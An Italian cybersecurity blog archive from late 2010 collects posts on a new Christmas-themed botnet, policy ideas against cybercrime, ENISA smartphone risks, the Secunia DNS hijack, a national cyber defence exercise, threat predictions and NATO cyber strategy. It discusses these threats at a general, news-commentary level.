venerdì 31 dicembre 2010

Bot(net)ti di fine anno

Shadowserver Foundation, la celeberrima organizzazione dedita alle attività di monitoraggio sul malware e sulle attività delle botnet, ha pubblicato un nuovo post sul proprio blog circa una nuova botnet che si sta formando proprio in questi giorni.

Come messo perfettamente in evidenza dall'analisi pubblicata, questa nuova campagna per distribuire malware ha un carattere di pericolosità che deve essere messo in evidenza.

Infatti, questa campagna associa aspetti più comuni a tratti di sofisticazione e pericolosità maggiori e ha tutte le caratteristiche per diventare, nel tempo, una nuova botnet con la quale fare i conti.

Innanzitutto il malware viene distribuito attraverso una massiccia campagna di mail che si spaccia per auguri natalizi, una tecnica che ha sempre dato ottimi frutti. Le mail in questione, hanno numerose intestazioni diverse e diversi testi e contengono sempre un link che punta a server compromessi o a nuovi domini che installano malware. Da notare che questi nuovi domini sono "fast flux" e quindi gli indirizzi IP cambiano in continuazione rendendo più complessa l'individuazione e la messa in campo di azioni di contenimento.

Se un incauto utente clicca sul link contenuto nella mail, viene visualizzato un messaggio che invita a scaricare un player flash (finto) che in realtà, tramite una serie di passaggi, alla fine installa il trojan che aggrega il PC dell'utente alla nuova botnet.

Shadowserver, al momento, osserva che la rete della botnet è ancora instabile e non tutto funziona alla perfezione ma, per essere una campagna appena iniziata, sembra davvero essere abbastanza preoccupante... tanto da far pensare ad una possibile evoluzione di botnet tristemente famose, quali Storm Worm o Waledac.

Quest'ultima in particolare, come ricorda Shadowserver, iniziò la sua campagna proprio il 31 dicembre (del 2008) con una campagna di finti auguri natalizi. La cosa consolante è che proprio Waledac è stata il campo di prova della strategia di contrasto attivo messa in atto nel 2010, come potete leggere su un mio precedente post.

Insomma, avrei preferito fare un post con gli auguri di buon anno senza "bad news", ma i cattivi, si sa, sono sempre in agguato... va bhe... 
Tanti tanti auguri a tutti e... stay tuned!

 Buon anno!!!

lunedì 20 dicembre 2010

Paolo Colombo - 10 idee per la lotta al Cyber Crime

E tre... siamo già arrivati al terzo appuntamento con le "Voci Amiche", ossia i post "esterni" che sono pubblicati sulle pagine di Punto 1. Sono veramente molto contento di ospitare per questo appuntamento un post dell'amico Paolo Colombo che, oltre alle tante iniziative sulla sicurezza che ha portato a termine nella sua attività di consulente, è anche fondatore della Community Italian Security Professional


E ora la parola a Paolo Colombo e alle sue "10 idee per la lotta al Cyber Crime"


"Eccomi qua a scrivere sul blog di Matteo… inutile dire quanto mi senta onorato di aver ricevuto questo invito, anche perché a me tocca il terzo intervento dopo due Guru della security e mantenere alto il livello dell’intervento non è certo cosa facile.

Molti che leggono questo blog già mi conoscono come fondatore della Community Italian Security Professional … Per tutti gli altri, sappiate che sono da sempre principalmente un appassionato di Sicurezza Informatica…

Vorrei sfruttare questo spazio per parlarvi di un tema che reputo centrale per la sicurezza del paese, la produttività delle nostre aziende e la loro capacità di competere sul mercato globale… Tranquilli non ho nessuna intenzione di parlarvi di politica, ma di Cyber Crime & Botnet  e di come, secondo me, questi temi andrebbero affrontati nel nostro paese (dalla politica?).  
Con Italian Security Professional, al Security Summit di Roma, abbiamo provato a dare un’idea di insieme del Cybercrime, provando ad analizzare anche il contesto in cui il cyber crime si può sviluppare come il Blackmarket e il Cyberlaundering.
Provo a sintetizzare per tutti, presenti e non al Summit, i punti di approdo della nostra discussione. 
In linea generale possiamo affermare che:
- la diffusione di malware al fine di creare botnet ha come scopo il guadagno (grazie Paolo se non ci fossi tu…)
- il fenomeno può esistere grazie ad un vero e proprio mercato fatto di canali IRC e forum dedicati alla vendita di ogni genere di informazione/servizio criminale
- il riciclaggio, e in particolare il cyberlaundering, è parte integrante di tutto questo, proprio come per ogni altra attività criminosa

Questo mercato fiorente fa si che i cyber criminali investano sull’efficacia delle loro minacce con veri e propri processi di Quality Assurance sui loro software. Il risultato è che i sistemi di difesa di oggi non sono più sufficienti ad arginare queste minacce. Sono ormai numerosi, ad esempio, i report in circolazione che testimoniano in modo più o meno eclatante, l’inadeguatezza degli antivirus nell’identificazione delle varianti dei bot al momento in cui vengono immessi su internet.
Immagino fino a questo punto di non aver detto molto di nuovo per voi che seguite abitualmente il blog di Matteo. 

Ora, vorrei proporvi un esercizio, che poi è il motivo del mio post, e cioè quello di focalizzare la nostra attenzione su cosa sia possibile fare nell’immediato da un paese come l’Italia per arginare questo tipo di problematica. Com’è nello stile, che condivido, di questo blog questo elenco esprime esclusivamente il mio punto di vista su come si può affrontare l’argomento, siete liberi (o meglio… caldamente invitati) di commentare e integrare la presente lista.

Partiamo dunque:
1. Cybersecurity Policy. Una normativa organica che regolamenti in maniera chiara la tematica. Non sono un legale, ma per darvi un’idea della complessità della materia provate a dare un'occhiata all’assessement eseguito da Melissa Hathaway per gli Stati Uniti
2. Adottare un'organizzazione statale efficace per la protezione delle Infrastrutture Critiche e la lotta al Crimine Informatico. A chi ha detto CNAIPIC consiglio la lettura di questo documento. Per i curiosi a me piace il modello Francese.
3. Istituire un unico CERT nazionale tra le cui attività sarebbe necessario, ad esempio, un monitoraggio attivo dei domini “.it” al fine di identificare eventuali siti compromessi che servono malware (esattamente come da qualche tempo fa il MELANI Svizzero)
4. Istituire un fondo di Venture Capital per la promozione di progetti e tecnologie legati alla Cybersecurity… alla http://www.iqt.org/ avete presente?
5. “Cyberintelligence is the Key”. E’ un mantra che vado ripetendo spesso ultimamente e significa semplicemente che reputo la Cyberintelligence la chiave di volta per combattere in maniera efficace il Cybercrime e le Cyber Threats in genere. Questo perché, essendo le minacce di oggi human-driven, è molto complicato creare un sistema di sicurezza efficiente tanto da riuscire a prevenire o contrastare la maggior parte di queste. La difesa dai Crimini informatici deve dunque essere guidata dall’intelligence per essere effettivamente efficace
6. Adottare nuovi standard come DNSSEC e RPKI. Se è vero che, anche grazie all’ottimo lavoro di Andrea Rigoni con la fondazione GC-SEC, molti di noi stanno iniziando a sentir parlare di DNSSEC è importante secondo me adottare di pari passo anche standard come RPKI per evitare che il traffico internet verso siti legittimi venga “dirottato” verso reti non “volute”
7. Provider di servizi internet, la prima barriera della sicurezza su internet: io opterei per un attivo coinvolgimento dei provider Internet nel ciclo di sicurezza dei propri utenti e clienti. Oltre che un qualcosa di utile alla sicurezza della nazione e dei propri cittadini sarebbe qualcosa di utile al business degli stessi provider
8. Sponsorizzare l’adozione di router broadband con feature di sicurezza integrate.  Se il liet motiv di Bill Gates è stato "un PC in ogni casa", direi che il passo successivo dovrebbe essere un "UTM in ogni casa". Anche in questo caso i provider giocherebbero ovviamente un ruolo fondamentale
9. Promuovere l’adozione di sistemi di sicurezza Reputation Based. Per quanto l’Italia sia uno dei pochi paesi avanzati, ad esempio, a non avere una propria “software house di Antivirus” sarebbe opportuno promuovere l’adozione dei nuovi modelli di antivirus basati su Cloud e Reputation
10. Ultimo ma forse più importante: promuovere un’educazione alla sicurezza informatica fin dalle scuole

...E direi che sarebbe già un buon inizio che ne dite?"

martedì 14 dicembre 2010

I 10 rischi per gli smartphone

ENISA, l'agenzia di sicurezza IT per l'UE, ha pubblicato un report dal titolo "Smartphones: Information security risks, opportunities and recommendations for users", con l'obiettivo di consentire una valutazione informata dello stato dei rischi per la sicurezza e la privacy legata all'utilizzo degli smartphone. ENISA ha quindi raccolto i dieci maggiori rischi e ha elencato anche 20 raccomandazioni pratiche su come affrontare tali rischi.

Ma vediamo più da vicino cosa ha messo in evidenza ENISA. Ecco la lista (un po' ragionata) dei 10 maggiori rischi a cui sono esposti gli utenti degli smartphone:

1 perdita di dati: un telefono cellulare rubato o smarrito, senza adeguate protezioni, può consentire un accesso indiscriminato ai dati memorizzati.
2 dismissione non accurata: uno smartphone smaltito o trasferito ad un altro utente senza un'adeguata rimozione dei dati sensibili, può consentire un accesso indiscriminato ai questi dati.
3 divulgazione involontaria di dati: la maggior parte delle applicazioni per gli smartphone consente di impostare adeguati livelli di privacy ma molti utenti non ne sono a conoscenza (o non lo ricordano).
4 Phishing: un attaccante può raccogliere le credenziali degli utenti (ad esempio password, numeri di carta di credito) tramite false applicazioni o falsi messaggi (sms, email) che si spacciano per autentici.
5 Spyware: i programmi per smartphone che richiedono privilegi eccessivi o che abusano degli stessi possono consentire di accedere o dedurre dati personali.
6 attacchi sulla rete wireless: se un utente si collega ad un punto di accesso wireless governato da un attaccante consente l'intercettazione delle sue comunicazioni di rete.
7 sorveglianza: è possibile spiare indebitamente un utente che utilizza uno smartphone la cui sicurezza è compromessa.
8 dialer: è possibile che un programma compia delle chiamate (o invii degli SMS) in modo nascosto verso numerazioni a pagamento, rubando quindi denaro all'utente.
malware finanziari: malware appositamente progettato per rubare numeri di carte di credito, credenziali di online banking o attaccare le transazioni finanziarie effettuate con lo smartphone.
10 congestione di rete: sono possibili sovraccarichi della rete a causa dell'utilizzo massivo di smartphone. Ciò può tradursi, per l'utente finale, nell'incapacità di collegarsi alle risorse di rete.

Il rapporto di ENISA, poi, elabora tre diverse tipologie di utenti ("Consumer", "Employee" e "High Official") a criticità crescente, verso le quali devono essere correlati i rischi e le raccomandazioni pratiche. 

Giles Hogben, co-autore del rapporto, ha commentato: "Gli smartphone sono una miniera di informazioni sensibili e personali - è essenziale capire come mantenere il controllo su questi dati. Abbiamo progettato le nostre raccomandazioni per inserirle all'interno di una tipica politica di sicurezza."

Insomma, una risorsa interessante per chi dovesse effettuare delle serie riflessioni sull'utilizzo degli smartphone sia a livello personale che aziendale...

venerdì 10 dicembre 2010

CyberWar: la Svizzera rafforza la protezione

Il Consiglio Federale Svizzero ha esaminato i rapporti sulle minacce cyber che incombono sulla Svizzera e, tra le varie contromisure adottate, ha nominato a tempo determinato il divisionario Kurt Nydegger quale responsabile del progetto per la «Cyber Defence». Nydegger, che è stato per anni a capo della Divisione della guerra elettronica, dirigerà un gruppo di esperti che dovrà elaborare entro la fine del 2011 una strategia globale della Confederazione contro le minacce cyber. Tale strategia sarà finalizzata all'individuazione delle  misure atte ad affrontare, in maniera più rapida ed efficace, gli attacchi digitali eventualmente rivolti contro la Svizzera.

Questo ulteriore passo, contribuisce a collocare la Confederazione Svizzera tra i paesi maggiormente evoluti sul tema del contrasto delle minacce cyber. Viene infatti ad essere inserito in un contesto in cui sono già state realizzate numerose e interessanti iniziative, tra cui:
- il CERT svizzero, la "Centrale svizzera d’annuncio e d’analisi per la sicurezza dell’informazione" (MELANI) che, in stretta collaborazione con i privati, identifica le minacce rilevanti per le Svizzera e attua le relative strategie di contrasto e sensibilizzazione 
- la Politica di Sicurezza varata il 30 giugno scorso, in cui sono analizzate e tenute in debito conto anche la minacce di natura cyber 

Il Consiglio Federale Svizzero ha mostrato nel corso degli anni una notevole lungimiranza e consapevolezza sulla particolare vulnerabilità dei Paesi altamente sviluppati come la Svizzera verso gli attacchi informatici. Questi Paesi, infatti, dipendendo in larga misura dalle reti e dalle infrastrutture comunicative, sono estremamente sensibili ad attacchi che minano il funzionamento e l'accesso a tali reti con gravi ripercussioni al corretto funzionamento dello Stato, dell’economia e della società.

Lo Stato, nella visione del Consiglio Federale, deve quindi adottare misure per proteggersi da simili attacchi e attenuarne le possibili conseguenze.

Proprio come da noi...

mercoledì 8 dicembre 2010

MUMBLE - Biancaneve e WikiLeaks

Si, ma che c'entrano Biancaneve e WikiLeaks con la sicurezza... C'entrano, c'entrano... provate a seguirmi ...

Ieri ho letto una notiziucola di contorno sul Corriere della Sera dal titolo "Biancaneve diventa ninfomane in Cina"; la sostanza è che due case editrici cinesi specializzate nei libri per bambini, in mancanza della versione originale in tedesco, hanno tradotto una versione giapponese della fiaba. Peccato che la versione che hanno scelto sia opera di due fumettisti che si divertono a rimaneggiare in chiave hard le fiabe più famose. 

Ecco che così, dopo la traduzione in cinese, i libri vengono stampati e nessuno si accorge dell'errore fino a quando i libri vengono messi in vendita nei negozi. Finalmente, i clienti si accorgono dell'errore e i libri vengono ritirati.

Perché questa notizia banale mi colpisce?

Beh, perché questa disavventura è una parabola in cui sono racchiusi tutti gli elementi della sicurezza, o meglio, della mancanza di sicurezza. 

Proviamo ad analizzare la vicenda sotto questa luce...

Nella società dell'informazione, l'informazione, appunto, è potere... e business. Ma solo a patto che l'informazione sia corretta. E qual'è un'informazione "corretta"? L'informazione corretta è un'informazione autenticata e integra (come vedete già stiamo parlando il linguaggio della sicurezza informatica), ma andiamo avanti. 

Quanti si occupano di sicurezza applicativa sanno che un "must" è la verifica dei dati di input, perché le  procedure, per quanto robuste, se si trovano a processare dati spuri non possono che dare, nel migliore dei casi, degli errori come risultato. Nel peggiore dei casi, invece, ci troveremo a processare dei dati che eseguono codice arbitrario sul nostro server. Un po' quello che è successo ai poveri editori cinesi... che invece di pubblicare una fiaba tedesca per bimbi hanno pubblicato una storia hard scritta da due giapponesi. 

Infine. La mancanza di governance di processo. Gli errori sono sempre possibili, ma, per restare nel campo dei rischi accettabili e accettati, è fondamentale realizzare un sistema di monitoraggio e di gestione degli incidenti e sottoporre tutti processi ad un sistema di governance. Solo così si riesce ad evitare di stampare, spedire e tentare di vendere la storia di una ninfomane invece della storia di una bella principessa odiata dalla regina cattiva.

Ok, ma che c'entra WikiLeaks?

A parte il trabocchetto sessuale che accomuna le due vicende, c'è un altro aspetto che le rende vicine.

L'aspetto dell'affidabilità delle informazioni. 

WikiLeaks ha scompaginato completamente una struttura ormai consolidata nel tempo, quella del "quarto potere". Fino ad oggi le notizie che ritenevamo affidabili (e quindi autenticate e integre) erano quelle pubblicate dalla stampa (termine che deve essere inteso in senso lato), il resto era qualcosa considerato appunto inaffidabile e che poteva essere visto come gossip o come vera e propria leggenda metropolitana. Tutto ciò è finito.

WikiLeaks ci ha mostrato che il re è nudo. WikiLeaks ha sovvertito questo ordine di cose, diventando la fonte della stampa che quindi riporta, in seconda battuta, le notizie da loro pubblicate. Il punto, adesso, non è se WikiLeaks sia o meno affidabile (per adesso sembra proprio che lo sia) il punto adesso è che non sappiamo più cosa sia affidabile e cosa non lo sia.

Il grande merito di WikiLeaks è di averci fatto accedere a materiali che ci erano stati negati, l'effetto collaterale è che la stampa non sarà più la stessa. E non abbiamo ancora idea di come dovrebbe essere.

Domani nasceranno mille siti come WikiLeaks e ci proporranno tutti delle verità sconcertanti sulla base di materiale segreto a cui dicono di aver avuto accesso. A chi dovremmo credere? Quale sarà la bussola che ci guiderà nella ricerca di notizie affidabili?

Nel prossimo futuro, purtroppo, penso che ci capiterà di leggere delle storie di una ninfomane che si diverte in un bosco assieme a sette nani e ci toccherà pensare che è una strana fiaba per bambini.

venerdì 3 dicembre 2010

MUMBLE - Il lato oscuro delle cloud

Un recente articolo apparso su Darknet.org.uk si è saldato con alcuni pensieri che stavo facendo proprio in questi giorni circa il mondo Cloud. 

A me pare che, finora, dal punto di vista della sicurezza delle cloud, ci si sia concentrati solo sull'aspetto della "difesa" dei dati e delle applicazioni che vengono spostati sulle nuvole. E questo mi sembra assolutamente naturale e giusto, dato che le cloud sono percepite, principalmente, come una risorsa potenzialmente strategica su cui investire. Si cerca quindi di capire quanto siano effettivamente sicuri questi servizi.

Già, ma questa è solo una parte del problema... l'altra parte, certamente meno frequentata ma altrettanto interessante per capire gli scenari futuri, è la seguente... le tecnologie Cloud quali scenari aprono dal punto di vista dei possibili attacchi e quali nuove possibilità possono offrire ai "cattivi"?

Come sappiamo, ogni nuova tecnologia ha, con il tempo, presentato un aspetto "evil" che in alcuni casi è risultato addirittura preponderante rispetto a quello inizialmente pensato... vero signor Nobel?

Ebbene qualcuno ha già pensato a come sfruttare il mondo cloud per fini non propriamente umanitari. Ad esempio, Thomas Roth, un ricercatore di sicurezza tedesco ha usato delle risorse cloud, basate su GPU, per eseguire un attacco di forza bruta finalizzato alla rottura degli hash SHA-1. E' già noto da almeno cinque anni che SHA-1 non poteva più essere considerato sicuro ma ciò che rende interessante il lavoro di Roth è la dimostrazione che ciò che richiedeva un lungo tempo di elaborazione o, in alternativa, molti soldi, può ora essere fatto da una sola persona, in pochi minuti, utilizzando delle risorse messe a disposizione da un cloud provider al prezzo di un caffè. Roth, infatti, ha speso poco più di 2 dollari.

Questo è solo un esempio, se ci si sofferma a pensare a quali possono essere gli impieghi malevoli delle cloud ci si apre davvero un mondo di possibilità...

Pensate quali vantaggi avrebbe chi dovesse nascondere dei dati compromettenti se utilizzasse un cloud provider compiacente con la propria sede in un paese dalla legislazione (o polizia) non propriamente attenta... 

Pensate a quali scenari si aprono se delle forze dell'ordine dovessero dare corso ad un sequestro di dati ospitati sulle cloud; quali difficoltà si troverebbero ad affrontare dal momento che non sarebbe nemmeno dato sapere dove si trovano fisicamente i dati stessi. E poi, le enormi difficoltà che si dovrebbero risolvere affinché il sequestro sia effettivamente utilizzabile in un eventuale processo.  

Pensate a tutti i servizi cloud di virtualizzazione di una postazione di lavoro, dove una moltitudine di soggetti può operare sulla stessa postazione e sugli stessi dati da tutto il mondo senza lasciare tracce se non nei log del fornitore di servizio (che può sempre essere un soggetto compiacente) rendendo quasi impossibile capire chi ha fatto cosa. 

Si potrebbe pensare anche a sistemi di comando e controllo di server reali che vengono portati a termine con le stesse modalità lasciando di nuovo le forze dell'ordine... all'asciutto. 

In ogni caso, come sappiamo bene, la creatività dei criminali in genere, e di quelli cyber in particolare, è veramente senza confini e quindi un potente strumento come quello delle cloud può essere facilmente sfruttato in modi che non è facile immaginare e prevedere.

In modo molto lungimirante, Brendan O'Connor, Ministro australiano per gli Affari Interni e la Giustizia, in un discorso recentemente tenuto presso la Conferenza Annuale di Sydney della "International Association of Privacy Professionals", ha trattato proprio di questi temi. 

Speriamo che il livello dei "decisori" sia sensibile a questi temi perché la realizzazione di un sistema internazionale di garanzie per le cloud non rappresenterebbe solamente un presupposto fondamentale per la costruzione di opportunità reali di business tramite questi strumenti ma diventerebbe un valido strumento per limitare la deriva verso il "lato oscuro" che potrebbe caratterizzare l'utilizzo futuro di questi strumenti.

venerdì 26 novembre 2010

Il DNS è una risorsa critica!!

Ieri la società di sicurezza Secunia, è stata vittima di un grave attacco informatico. Per oltre un'ora chi tentava di collegarsi al loro sito otteneva come risposta la pagina che vedete riportata a fianco.

Ciò che tutti hanno immediatamente pensato è che il sito di Secunia avesse subito un defacement... in realtà ciò che era realmente successo è che era stato attaccato il DNS autoritativo del loro sito. 
Quindi, il sito di Secunia era intatto ma chi cercava di collegarsi a www.secunia.com veniva in realtà indirizzato verso un sito diverso.

 Questo attacco è stato realizzato da TurkGuvenligi, che, come riporta The Register, è un hacker che ha già in precedenza utilizzato questo tipo di tecniche di reindirizzamento del sito in altri attacchi e sembra essere motivato da intenti non particolarmente malevoli.

Secunia ha pubblicato una nota ufficiale sull'accaduto nella quale si ribadisce che l'attacco non era indirizzato alla loro infrastruttura ma a quella del loro registrar, DirectNIC, e che ha impattato anche altri siti. Inoltre viene ribadito che i dati dei clienti non sono minimamente stati impattati.

Questi, i fatti. Ora, giusto un paio di riflessioni...

TurkGuvenligi, l'hacker che ha effettuato l'attacco, qualifica l'attacco stesso come un defacement, tanto che (come si può vedere dalla figura sottostante) lo pubblica su Zone-H come defacement di home page. 
Quindi, a mio modo di vedere, dato l'esito e le intenzioni dell'attaccante, diventa veramente poco importante se l'attacco ha o meno impattato direttamente l'infrastruttura del sito oppure delle componenti esterne... si è trattato di un defacement!

Seconda considerazione, e se il "buon" TurkGuvenligi invece di pubblicare un sito dove veniva glorificata la sua bravura avesse invece pubblicato un "clone" del sito di Secunia e avesse carpito le utenze degli ignari clienti? Oppure nel sito falso avesse pubblicato un falsa notizia circa un aggiornamento di una tecnologia molto diffusa, facendo magari scaricare del malware a diverrse migliaia di utenti?

E se il prossimo attacco avesse nel mirino una banca? O una Amministrazione dello Stato?

Scenari a dir poco agghiaccianti!

Insomma, tutto questo per ribadire che... il DNS è una risorsa critica!

Molto critica!!!

giovedì 25 novembre 2010

Cyber Shot 2010: l'esercitazione di Cyber Defence Nazionale

Finalmente posso parlarne!! Da quando è terminata l'esercitazione Cyber Shot 2010 avrei voluto fare dei commenti ma ho dovuto aspettare che uscisse il comunicato stampa ufficiale dello Stato Maggiore della Difesa.

In quest'occasione, contravverrò alla regola che mi sono dato di non scrivere di attività che mi vedono direttamente coinvolto, ma la notizia è troppo importante per non parlarne. Ma, veniamo ai fatti... nei giorni scorsi ho avuto l'onore di partecipare, presso il Comando C4 Difesa, all'esercitazione di "cyber defence" nazionale "Cyber Shot 2010", nella quale i CERT delle Forze Armate e di alcune istituzioni civili hanno simulato la reazione ad una crisi internazionale che sfociava in una serie di attacchi di Cyber Warfare. L'esercitazione era finalizzata a valutare le capacita' di risposta e cooperazione delle organizzazioni partecipanti e a perfezionare le procedure di scambio informativo in ambito nazionale. 

L'esercitazione, organizzata dal CERT-Difesa Technical Centre, è durata tre giorni (e le fasi preparatorie per i player altri 5) e, come accennavo prima, ha visto la partecipazione in veste di player (è il termine tecnico che si usa in queste occasioni) del personale dei CERT dell'Esercito, della Marina, dell'Aeronautica, dell'Arma dei Carabinieri, della ULS MEF/Consip (di cui ho la responsabilità) e dell'ENAV, hanno inoltre partecipato in veste di centri di coordinamento il CNAIPIC (Centro Nazionale Anticrimine Informatico per la Protezione delle Infrastrutture Critiche) e il CERT-SPC (il CERT della PA), infine, in qualità di osservatori erano presenti la Presidenza del Consiglio dei Ministri e alcune rappresentanze del mondo industriale.

L'esercitazione è stata gestita, per la prima volta, realizzando dei veri e propri attacchi cyber verso dei sistemi simulati che erano sotto la responsabilità dei vari player riuniti in una grande sala operativa ospitata presso il Comando C4 Difesa. Nel corso dei tre giorni abbiamo avuto modo di confrontarci con diverse tipologie di attacchi, alcune delle quali abbastanza sofisticate e pensate per cercare di passare inosservate. Devo dire che è stato un momento di importante confronto con gli altri team e un modo per accrescere l'esperienza del personale coinvolto. 

Devo quindi fare un grande plauso a chi ha fortemente voluto e organizzato questo importante momento di crescita e verifica delle capacità di risposta ad attacchi cyber che possono essere messe in campo dal nostro paese.

Una volta tanto, possiamo quindi essere davvero fieri di un'iniziativa che ci pone all'avanguardia anche rispetto a quei paesi che sono normalmente più attenti verso questi argomenti.


mercoledì 24 novembre 2010

Le predizioni per il 2011 di M86 Security

M86 ha pubblicato un report con le predizioni delle minacce per il 2011. L'interessante documento riporta le 8 minacce che saranno, secondo M86, le più rilevanti nel corso del prossimo anno.

Di queste otto predizioni, quelle che mi hanno colpito maggiormente sono queste tre:

Aumenterà il malware firmato con certificati digitali rubati
Nel corso del 2010 si è avuta la certezza che i creatori di malware hanno deciso di imboccare la strada del "reperimento" di certificati digitali rubati per firmare alcune componenti del malware al fine di bypassare le protezioni introdotte dai sistemi operativi. Questa certezza è arrivata anche con scoperta che l'ormai celeberrimo worm Stuxnet risulta firmato con due diversi certificati digitali rubati e che anche una variante del Trojan Zeus è stata firmata digitalmente con un certificato rubato a Kaspersky. M86 prevede che questa tendenza aumenti nel prossimo anno, in quanto i cybercriminali puntano sempre alle modalità di evasione dei sistemi di rilevamento del malware che si dimostrano più efficaci.

L'HTML5 sarà un nuovo obiettivo per i criminali informatici
L'HTML5 è uno standard multi-piattaforma per la navigazione Web su cui i maggiori produttori mondiali di software e contenuti stanno fortemente puntando. HTML5, inoltre, è dotato di un supporto per lo scripting API (application programming interfaces) che potrebbe facilmente essere utilizzato da criminali informatici. Per cui, mentre gli sviluppatori stanno sperimentando l'HTML5 per scopi legittimi, i cybercriminali stanno cercando di trovare il modo di sfruttare questo standard per i loro loschi affari. M86 si aspetta che i primi risultati delle "ricerche" per sfruttare le eventuali vulnerabilità di questa nuova tecnologia, arriveranno nel prossimo anno.

L'offerta di  Malware-as-a-Service (Maas) aumenterà
Le ricerche di M86 indicano che gli sviluppatori di exploit kit hanno iniziato anche a fornire "servizi", affiancandoli alla più classica offerta di applicazioni. Ad esempio, il Neosploit e il Phoenix exploit kit offrono diversi servizi malware ai loro clienti. Così come il mondo dell'impresa sta imboccando la strada dei servizi cloud, i cybercriminali stanno sviluppando un approccio simile che consente loro di offrire una suite completa di servizi. M86 quindi prevede che nel prossimo anno crescerà in modo significativo l'offerta di questi servizi che si andrà ad affiancare all'offerta più "classica" di exploit kit. In questo modo, inoltre, è possibile che le architetture di comando e controllo delle botnet realizzate diventino sempre più stratificate e complesse, rendendo così la vita più difficile ai ricercatori di sicurezza e alle autorità

Che ne dite? Siete d'accordo con queste previsioni? L'appuntamento di verifica è per il 24 novembre 2011... non mancate!!

lunedì 22 novembre 2010

NATO: New Strategic Concept

Il 19 e 20 Novembre si è svolto a Lisbona il meeting dei Capi di Stato e di Governo della NATO. La discussione è stata centrata anche sui nuovi assetti dell'Alleanza e sui nuovi obiettivi che la caratterizzeranno.

Al termine dei lavori è stato pubblicato un documento dal titolo "Strategic Concept For the Defence and Security of The Members of the North Atlantic Treaty Organisation" che definisce una NATO evoluta: più agile, più capace e più efficace ed in grado di  difendere i suoi membri contro le moderne minacce.
"La NATO è una comunità di libertà, di pace, di sicurezza e di valori condivisi", ha detto il Segretario Generale. "Ma il mondo sta cambiando. Siamo di fronte a nuove minacce e sfide nuove. E questo approccio strategico dovrà garantire che la NATO rimanga efficace come sempre nella difesa della nostra pace, della nostra sicurezza e della nostra prosperità. "
Il nuovo Strategic Concept, quindi, esorta gli alleati ad investire nelle capacità chiave per affrontare le minacce emergenti sviluppando in seno alla NATO le capacità necessarie per difendersi contro attacchi di missili balistici e attacchi informatici. 

E qui arrivano le cose interessanti per chi si occupa di Cyber Warfare e Cyber Security...
Infatti, nella sezione "The Security Environment" al punto 12 si trova un'analisi dello scenario relativo agli attacchi cyber:
"gli attacchi informatici sono sempre più frequenti, più organizzati e più costosi dal punto di vista dei danni che infliggono ai governi, alle imprese, alle economie e, potenzialmente, alle reti di trasporto e approvvigionamento e alle altre infrastrutture critiche; questi attacchi possono raggiungere una soglia che minaccia la prosperità, la sicurezza e la stabilità delle nazioni e dell'Alleanza. Eserciti stranieri, servizi di intelligence, criminalità organizzata, terroristi e/o gruppi estremistici possono essere la fonte di tali attacchi."

Per quanto riguarda invece le decisioni strategiche in merito a questi problemi, al punto 19, viene detto:
"Faremo in modo che la NATO abbia l'intera gamma delle capacità necessarie per dissuadere e difendere contro ogni minaccia all'incolumità e alla sicurezza delle nostre popolazioni. Pertanto, noi:
svilupperemo ulteriormente la nostra capacità di prevenire, rilevare, difenderci e recuperare i danni causati dagli attacchi informatici, anche attraverso l'uso dei processi di programmazione della NATO finalizzati al rafforzamento e alla coordinamento delle capacità nazionali di cyber-defence, portando tutti gli enti della NATO sotto un sistema di protezione centralizzato e migliorando l'integrazione dei programmi di awareness della NATO, e i programmi di allarme e risposta dei paesi membri.".

Insomma, una dichiarazione forte e chiara che è stata sottoscritta da tutti i Capi di Stato e di Governo... chissà che non cada nel vuoto anche questa occasione...


sabato 20 novembre 2010

Feliciano Intini – Sicurezza su Internet, non solo Quarantena

Eccoci al secondo appuntamento con le "Voci Amiche", la rubrica nella quale ospito i contributi di amici che stimo e apprezzo e che vogliono dire la loro utilizzando le pagine di Punto 1.

Con mia grande gioia, l'amico Feliciano Intini, Responsabile dei programmi di Sicurezza e Privacy di Microsoft Italia, ha raccolto il mio invito a scrivere un post per la rubrica "Voci Amiche" e quindi... eccomi a pubblicare il suo post "Sicurezza su Internet, non solo Quarantena". Grazie Feliciano!

"Accolgo con vero piacere l’invito dell’amico Matteo ad essere ospitato nel suo blog, e approfitto di questa occasione per estendere ai lettori che lo seguono, che immagino dei veri appassionati di sicurezza, una importante discussione relativa ad un tema che è allo stesso tempo molto ambizioso ma non per questo meno urgente da trattare: è possibile ipotizzare un modello ed una architettura sostenibili che rendano Internet una realtà strutturalmente più sicura di quanto non lo sia oggi?

Lo so, messa così sembra la classica domanda “...da un milione di dollari”, ma spero che le considerazioni che mi appresto a condividere siano in grado di farvi riflettere sul fatto che un modello possibile forse esiste, o perlomeno vi aiutino a trovare interessanti obiezioni contro di esso, in modo da stimolare una costruttiva discussione. 

Scott Charney, Corporate Vice President della divisione Trustworthy Computing di Microsoft, ha lanciato questa stessa provocazione poco più di un mese fa nell’ambito di una keynote all’ISSE 2010 di Berlino: ho prestato particolare attenzione alle riprese di questa notizia da parte di giornalisti e blogger, nella speranza di veder nascere un bel dibattito su questo tema che credo ci tocchi particolarmente da vicino, non solo quali professionisti di sicurezza ma anche come semplici "netizens" sempre più coinvolti nell’uso di Internet come strumento nativo della nostra vita sociale, ma ho solo assistito ad articoli che hanno approfittato del concetto di “quarantena” dei PC per provocare il classico sensazionalismo mediatico. 
Permettetemi allora di fare un passo indietro e di riproporvi in breve questa proposta per sottolineare quegli aspetti che credo meritino una valutazione più attenta e delle considerazioni meno frettolose.

L’idea di fondo è davvero semplice quanto disarmante e parte da un assunto che mi ritrovo spesso a riproporre perché sento particolarmente vero: Internet non è un mondo parallelo alla nostra vita reale, quanto una potentissima estensione della stessa vita fisica, che accelera e amplifica situazioni e relazioni che viviamo ogni giorno, certo aggiungendo in questo modo una notevole complessità. Con questa chiave di lettura, non è astruso prendere spunto da modelli che si sono rivelati efficaci nella nostra vita fisica per provare ad applicarli alla nostra vita “virtuale” adattandoli alla nuova complessità. E questo è stato fatto nel proporre le dinamiche che normalmente usiamo per tutelare la salute pubblica a livello internazionale come base per un modello applicabile alla sicurezza dei device (non solo PC, ma qualsiasi dispositivo in grado di connettersi in rete) che intendano connettersi ad Internet.
Non vorrei banalizzare il concetto a causa della brevità dello spazio a mia disposizione (e per questo vi invito a leggere le sette paginette nette del relativo paper “Collective Defense: Applying Public Health Models to the Internet”) ma, in estrema sintesi, non si tratta semplicemente di forzare la quarantena per i PC che risultassero non conformi alle policy da prevedere per autorizzare l’accesso incondizionato ad Internet, quanto di iniziare collettivamente a concordare su un paio di principi di fondo per poi darsi da fare, e in fretta, alla ricerca di soluzioni pratiche condivise.

